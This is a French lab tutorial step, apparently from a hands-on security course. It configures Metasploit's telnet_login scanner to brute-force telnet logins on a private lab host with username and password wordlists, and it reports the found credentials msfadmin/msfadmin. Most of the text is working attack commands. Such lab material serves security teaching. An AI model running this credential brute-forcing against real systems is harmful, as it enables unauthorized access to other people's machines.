Dans cette étape, nous allons configurer le module Metasploit avec l'hôte cible, le dictionnaire de noms d'utilisateur et le dictionnaire de mots de passe.
Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
Utilisez le module auxiliary/scanner/telnet/telnet_login
:
use auxiliary/scanner/telnet/telnet_login
Définissez l'hôte cible :
set RHOSTS 192.168.122.102
Définissez le fichier de dictionnaire de noms d'utilisateur :
set USER_FILE /username.txt
Définissez le fichier de dictionnaire de mots de passe :
set PASS_FILE /password.txt
Enfin, exécutez l'exploit :
exploit
Metasploit commencera à tester différentes combinaisons de noms d'utilisateur et de mots de passe à partir des dictionnaires fournis. Si des identifiants valides sont trouvés, ils seront affichés en vert.
Dans ce cas, les identifiants valides sont msfadmin/msfadmin
.
Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection